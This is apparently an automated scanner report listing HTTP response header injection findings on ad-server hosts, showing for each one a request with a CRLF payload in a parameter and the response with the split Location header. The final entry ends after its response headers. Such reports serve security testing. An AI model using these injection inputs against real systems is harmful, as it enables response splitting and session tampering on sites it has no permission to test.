Set-Cookie: ANON_ID=awnEZcdyOZbS5RJTyZcqJuZa3ATPUn1CUg8mBZd3i05WKW0PirnKHZapXrZbZc5dIZcvRqNEFswIfiVSWGE0foKqmufRGJ9oVRVKs8ZdcZdZcgUpKZaoxBmLeKOxnyiJg8YZaqtcdZbdRyZbIRZafngf1sjU9BfNSPLZd0XN812uTiCyo7KxZb10l2sYNscX8OLyiEZcnWx7CE2Jrkv7S9O81LD7ADs78kQAtksNnAhbITX1obWkKmCMVe9ZdCNAcRBr71E9I92qa5tEymZbp8mCdcnMOSaHYpTGGZc8XgFV7LVaLfcXO1IvtGZbhUZapUyZbLMMiGQ95AYGGQZbrPu0gmQJGIjO8VDZbqNfqZdxyO9eWZcenuyqnq8ciPvfjFrRtrj0BYVCQC640AbF8ZbyjTGMaSY88NokoynB0fAXHasT6eGclituvZdfeRn2LOpprh5YBUQNYWq6f6XIcPRZdBPCJjnfafK49CaYGgZcRwTPxC2ZdOvKCOWM2sqUvoRTpMFnJYgyDkLG0XorWrORy5h4Zd25dfG0Za3MWfZdTtTZcjZaZaZcyAJDytni1nc48AEZdk5CGduvPgt054NHf5sxRXsWYckMjHibV57; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:33 GMT;
Content-Type: text/html
Location: http:/e3bb1
8e9ee6e06df/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 558f5%0d%0a3e39ab254d8 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/558f5%0d%0a3e39ab254d8 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aenEZcdu4YUMPqcnl3fo2nXr9nGUdfSJS2ZdVl4PQL5cvjQ0JVjd5Wv1wo62492SGtZcIFuTJWapG0M4e17yOwT3noFCfFtccd14rv6kgVvYtBicKsCfDHZaV8isHWaytmpLetKYJZcA0Cm2GeZdsGijIwE6kIqV53ZcBRnDyJZa8ZcU6QdNsP0muZaZbCkX5mVKnY2rquSCaoBtoaRU4uU8o36LGojATkET033RI2ZalVdl5Hc4srLr0topddiih4UUVJA4Y5vAuAfbZbBxomBxnfqLlLu6UwvgbAydDaGmhatZbZcl0Ko3AaKYVlWnfX8jS9EbdtJoHo9nqFyHMRmusNMXjTjxrAF0wJhELNrcZdjEfsBVQqStr3L3wt2nrnTcQNCZdZa2WtjG25CHuCVVUmrH6bn7i9eGlcwn6aPWEXalQZaCutaZbKVZdJZaYkQlxSYB4eZdXYuJbH2jheVuZbSAk3NrOS2ZcTZat86dxgxVws7RporTvmnUXWuc2xIIbXZci56Jqw10NN0WnXMZcxZauE5pTUpPVAIZdZcnyn769sd3qwCCfibusFy5GixM5isR9tO9C2d0G5T8JfxT9vfZb7g1; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:58 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/558f5
3e39ab254d8
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of the a request parameter is copied into the Location response header. The payload dca0d%0d%0a172d6a83c62 was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r;a=dca0d%0d%0a172d6a83c62&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ahnEZcdm5abw6yuoZbUjT4fqUDUD2sYQZdDZaWW5gcOxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRm7xqnMnbNZckbcJL08tom0uWyJjGe8Zdt6BlH3Zcgcsh0fhhxv3ZaQZcwFXZaO9JVcJ3us2ZdEZbqUeIufqjSpys4WJ0ZcM4mr6MsaUrZcq3FYXmmEoyQZaT2oCpbp7Sa9R3qwWor4D8Mm5YBhUPfTZcWiokxRZdyDL8ZbxJGTKqMF1iAxwbpb54Zai70umIZbgT65ppZbnyB7gIZbDyGW8UKFavkRTEsxqlZaN1iaCB0Zbhnt9bYgMbvK8Cj2qIwq36U2FZdw8PHnZcPIElM4thBbssCLqiUdc6BFUqKGbcRobHZaYNo3S33TtJsIZd6Q06nZbVJc7y70AYUTNgFPp8SXa9QKEca2elev3OL5Sto7v35jL0kb6Nb7QY5ZdtYgneZdZaZaD8HJZaR6KLvrtv4ZaELqBJ2vX8DOdb7w7mmWRbQmEagXeFqev4lPVrOVZaLFXg4cTZdsNZbIqRmbujXWMuINv8oDedPbFX08cibqIqDiZd4jLJfCGZcv44L9PUotwStxiMo6HuUZbfV; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:20 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=dca0d
172d6a83c62&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of the dcc request parameter is copied into the Location response header. The payload 3a2f2%0d%0a19a38b62d09 was submitted in the dcc parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=3a2f2%0d%0a19a38b62d09 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ahnEZcdm5abw6yuoZbUjT4fqUDUD2sYQZdDZaWW5gcOxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRm7xqnMnbNZckbcJL08tom0uWyJjGe8Zdt6BlH3Zcgcsh0fhhxv3ZaQZcwFXZaO9JVcJ3us2ZdEZbqUeIufqjSpys4WJ0ZcM4mr6MsaUrZcq3FYXmmEoyQZaT2oCpbp7Sa9R3qwWor4D8Mm5YBhUPfTZcWiokxRZdyDL8ZbxJGTKqMF1iAxwbpb54Zai70umIZbgT65ppZbnyB7gIZbDyGW8UKFavkRTEsxqlZaN1iaCB0Zbhnt9bXPMbvK8Cj2qIwq36U2FZdw8PHnZcPIElM4thBbss0LXiUdc6BFUqKGbcRobHZaYNo3S33TtJsIZd6Q06nZbVJc7y70AYUTNgFPp8SXa9QKEca2elev3OL5Sto7v35jL0kb6Nb7QY5ZdtYgneZdZaZaD8HJZaR6KLvrtv4ZaELqBJ2vX8DOdb7w7mmWRbQmEagXeFqev4lPVrOVZaLFXg4cTZdsNZbIqRmbujXWMuINv8oDedPbFX08cibqIqDiZd4jLJfCGZcv44L9PUotwSsmsM2ZaviZbZa9f; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:51 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=3a2f2
19a38b62d09
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of the dcp request parameter is copied into the Location response header. The payload e956a%0d%0a58d4acea581 was submitted in the dcp parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=e956a%0d%0a58d4acea581&dcc=39942763.226884546 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=asnEZcdxZduBwoApTwrxUjYrtQJqXsQZaZb6fZbVxooN01mQOFIJFMXPVMoxcmDomur8rVZdZdyuy0WcfT1gSx9ZaZcvbZbSMD8ZaDH4CZc0gemFHZa4ibQGZawTwQBjZaM05ZacZcP6hZdQw36kCJBsZdfoQ0cBHMnaXZblEwlwbQRN8urCV7Hu8RYAjZdwb7ZcrYPDHeuoxqlWyZcy1MCslvROE9AfMtngmyQCusZdfGac2XS4kqXjxPFj8rhO5UBbslSADP8JWdNsLJL33POBmyAafgu9QUyS37kw9gHaRTeWuZcgR2YqXQrZb0Dub9YVZaXZbElE7AW9fw8Pru10V7V7fpZduhI5DjYm1iVqlLEDqKXkjikuF4hEF3hIpuR18JxZaMcfP8355W3D85F1S6UdUJK4mR4k0DFccFXfdT6pgpwh7VBPJxIVsOWbvPZbV0lra3M6xNoFZd1klrR0iD8ZcaEjHZaGXSchvdDmSg2ZcVSfYOIREmTfPMnJeMQbSwUFTQ07elI8qNSjDqNcHUvKnSNKqKvZa90UnXSH72IiFfTqInQVrYumw17qAfBZdgEilQMDdVr5jtP2qKvPUdwTlFqHc35Oe; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:40 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=e956a
58d4acea581&dcc=39942763.226884546
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d90e5%0d%0a5824a831334 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r?d90e5%0d%0a5824a831334=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a7nFsewyEosSuMNybLUOBQXDb7Stj9HWudYOkb4JpJXZcvdLTBs2m7mVEIItmmg6ALxGiTA0pNoYggQmDXxSreYqDGcAHoMCfkGpSVTRijLDLCDppnCLZdHdgrO1f5HdqOZaBFvYYIwtK0nbYOAE0G5YQCuZbV3NdoOnwBHgV1TcrKXtBLpJ6EI1qDyaVZdVZbyYtSWQm61XanUcYqoZa49lwx2MQ9W6RTlVFo3obZcMNQhj94dRVvRppQA1LPwsDTJNuKNbeeBFncvPjcmoblEyp0HsKmHFT17S6sNlA5C45lFmnlFfnhjU3r1FruZdoZbp404NTTqHGeHq5drCMgiTOZd5nfalRxjAExFoTIsYFLbfKW8B7Jw4NYAjmXbAxEZaqP0T3Q1hcnt8GB3PAMcRytbbAn7DdAZaTfWGxZb2yZaxFvCv5WJj7OlANu8rIT39EUKU1IZbaGdVjuQ7CtNVOhMlEoq7E1o1GStbU0wAnYW7icnFYmQE4WyDxftAMZaiqBuQZbRnSmj1CIjcViy9ymbYSTntGwQWZaLprvceo0I8v15Uf8aUfaPj4DqKICRd9p9vIrmOjGGQuSQjSPd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:02 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r?d90e5
5824a831334=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of the vehicle request parameter is copied into the Location response header. The payload 2947d%0d%0a05ef6ceb7f1 was submitted in the vehicle parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=2947d%0d%0a05ef6ceb7f1&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ahnEZcdm5abw6yuoZbUjT4fqUDUD2sYQZdDZaWW5gcOxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRm7xqnMnbNZckbcJL08tom0uWyJjGe8Zdt6BlH3Zcgcsh0fhhxv3ZaQZcwFXZaO9JVcJ3us2ZdEZbqUeIufqjSpys4WJ0ZcM4mr6MsaUrZcq3FYXmmEoyQZaT2oCpbp7Sa9R3qwWor4D8Mm5YBhUPfTZcWiokxRZdyDL8ZbxJGTKqMF1iAxwbpb54Zai70umIZbgT65ppZbnyB7gIZbDyGW8UKFavkRTEsxqlZaN1iaCB0Zbhnt9bYsMbvK8Cj2qIwq36U2FZdw8PHnZcPIElM4thBbssoLyiUdc6BFUqKGbcRobHZaYNo3S33TtJsIZd6Q06nZbVJc7y70AYUTNgFPp8SXa9QKEca2elev3OL5Sto7v35jL0kb6Nb7QY5ZdtYgneZdZaZaD8HJZaR6KLvrtv4ZaELqBJ2vX8DOdb7w7mmWRbQmEagXeFqev4lPVrOVZaLFXg4cTZdsNZbIqRmbujXWMuINv8oDedPbFX08cibqIqDiZd4jLJfCGZcv44L9PUotwStRAMouuXZbJm3; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:30 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=2947d
05ef6ceb7f1&dcp=zmm.50658498.&dcc=39942763.226884546
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.126. http://ad.afy11.net/ad [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The value of the c request parameter is copied into the Location response header. The payload 3690c%0d%0a1a9836ae15c was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!http://ad.doubleclick.net/jump/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=2803508621?3690c%0d%0a1a9836ae15c HTTP/1.1
Host: ad.afy11.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: f=AgECAAAAAAALqJELwX83TQyokQsDfjdN; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAxZEByjtDTQAAAAAAAAAAAAAAAAAAAADUO0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; a=AZ7s9B85IkyRNDgbVDU-vg;

Response

HTTP/1.0 302 Moved Temporarily
Connection: close
Server: AdifyServer
